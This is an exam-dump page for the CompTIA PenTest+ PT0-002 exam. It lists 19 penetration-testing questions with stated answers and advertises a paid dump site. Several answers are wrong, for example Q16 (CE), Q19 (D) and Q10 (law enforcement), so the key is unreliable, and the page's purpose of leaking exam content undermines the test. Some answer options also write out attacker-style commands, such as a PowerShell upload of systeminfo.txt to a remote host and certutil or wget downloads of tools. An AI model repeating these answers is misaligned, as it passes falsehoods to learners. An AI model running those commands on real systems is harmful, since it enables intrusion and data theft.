Avant-garde PT0-002 Dump For CompTIA PenTest+ Certification Exam Certification

we provide Guaranteed CompTIA PT0-002 download which are the best for clearing PT0-002 test, and to get certified by CompTIA CompTIA PenTest+ Certification Exam. The PT0-002 Questions & Answers covers all the knowledge points of the real PT0-002 exam. Crack your CompTIA PT0-002 Exam with latest dumps, guaranteed!

Check PT0-002 free dumps before getting the full version:

NEW QUESTION 1
A penetration tester wrote the following script to be used in one engagement:
PT0-002 dumps exhibit
Which of the following actions will this script perform?

  • A. Look for open ports.
  • B. Listen for a reverse shell.
  • C. Attempt to flood open ports.
  • D. Create an encrypted tunnel.

Answer: A

NEW QUESTION 2
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  • A. Analyze the malware to see what it does.
  • B. Collect the proper evidence and then remove the malware.
  • C. Do a root-cause analysis to find out how the malware got in.
  • D. Remove the malware immediately.
  • E. Stop the assessment and inform the emergency contact.

Answer: E

NEW QUESTION 3
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. certutil–urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • B. powershell(New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)
  • C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
  • D. wgethttp://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Answer: B

NEW QUESTION 4
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
PT0-002 dumps exhibit


Solution:
* 1. Reflected XSS - Input sanitization (<> ...)
* 2. Sql Injection Stacked - Parameterized Queries
* 3. DOM XSS - Input Sanitization (<> ...)
* 4. Local File Inclusion - sandbox req
* 5. Command Injection - sandbox req
* 6. SQLi union - paramtrized queries
* 7. SQLi error - paramtrized queries
* 8. Remote File Inclusion - sandbox
* 9. Command Injection - input saniti $
* 10. URL redirect - prevent external calls

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 5
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

  • A. Cross-site request forgery
  • B. Server-side request forgery
  • C. Remote file inclusion
  • D. Local file inclusion

Answer: B

NEW QUESTION 6
A penetration tester performs the following command: curl –I –http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
PT0-002 dumps exhibit

  • A. Option A
  • B. Option B
  • C. Option C
  • D. Option D

Answer: A

NEW QUESTION 7
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

  • A. NDA
  • B. MSA
  • C. SOW
  • D. MOU

Answer: C

NEW QUESTION 8
A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company’s network. Which of the following accounts should the tester use to return the MOST results?

  • A. Root user
  • B. Local administrator
  • C. Service
  • D. Network administrator

Answer: C

NEW QUESTION 9
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  • A. MD5
  • B. bcrypt
  • C. SHA-1
  • D. PBKDF2

Answer: A

NEW QUESTION 10
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

  • A. Halt the penetration test.
  • B. Contact law enforcement.
  • C. Deconflict with the penetration tester.
  • D. Assume the alert is from the penetration test.

Answer: B

NEW QUESTION 11
You are a penetration tester reviewing a client’s website through a web browser. INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
PT0-002 dumps exhibit
PT0-002 dumps exhibit
PT0-002 dumps exhibit
PT0-002 dumps exhibit
PT0-002 dumps exhibit
PT0-002 dumps exhibit
PT0-002 dumps exhibit


Solution:
Graphical user interface Description automatically generated

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 12
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?

  • A. nmap -sT -vvv -O 192.168.1.2/24 -PO
  • B. nmap -sV 192.168.1.2/24 -PO
  • C. nmap -sA -v -O 192.168.1.2/24
  • D. nmap -sS -O 192.168.1.2/24 -T1

Answer: D

NEW QUESTION 13
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:
PT0-002 dumps exhibit
However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?

  • A. The HTTP port is not open on the firewall.
  • B. The tester did not run sudo before the command.
  • C. The web server is using HTTPS instead of HTTP.
  • D. This URI returned a server error.

Answer: A

NEW QUESTION 14
A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the following:
* Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang=”en”>
<head>
<meta name=”viewport” content=”width=device-width” />
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8” />
<title>WordPress &#8250; ReadMe</title>
<link rel=”stylesheet” href=”wp-admin/css/install.css?ver=20100228” type=”text/css” />
</head>
Which of the following tools would be BEST for the penetration tester to use to explore this site further?

  • A. Burp Suite
  • B. DirBuster
  • C. WPScan
  • D. OWASP ZAP

Answer: A

NEW QUESTION 15
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Capture traffic using Wireshark.
  • C. Perform a brute-force attack over the server.
  • D. Use an FTP exploit against the server.

Answer: B

NEW QUESTION 16
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
• The following request was intercepted going to the network device: GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
• Network management interfaces are available on the production network.
• An Nmap scan returned the following:
PT0-002 dumps exhibit
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

  • A. Enforce enhanced password complexity requirements.
  • B. Disable or upgrade SSH daemon.
  • C. Disable HTTP/301 redirect configuration.
  • D. Create an out-of-band network for management.
  • E. Implement a better method for authentication.
  • F. Eliminate network management and control interfaces.

Answer: CE

NEW QUESTION 17
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

  • A. VRFY and EXPN
  • B. VRFY and TURN
  • C. EXPN and TURN
  • D. RCPT TO and VRFY

Answer: A

NEW QUESTION 18
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
PT0-002 dumps exhibit
Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Hydra and crunch
  • B. Netcat and cURL
  • C. Burp Suite and DIRB
  • D. Nmap and OWASP ZAP

Answer: C

NEW QUESTION 19
A penetration tester conducted a discovery scan that generated the following:
PT0-002 dumps exhibit
Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

  • A. nmap –oG list.txt 192.168.0.1-254 , sort
  • B. nmap –sn 192.168.0.1-254 , grep “Nmap scan” | awk ‘{print S5}’
  • C. nmap –-open 192.168.0.1-254, uniq
  • D. nmap –o 192.168.0.1-254, cut –f 2

Answer: D

NEW QUESTION 20
......

Thanks for reading the newest PT0-002 exam dumps! We recommend you to try the PREMIUM 2passeasy PT0-002 dumps in VCE and PDF here: https://www.2passeasy.com/dumps/PT0-002/ (110 Q&As Dumps)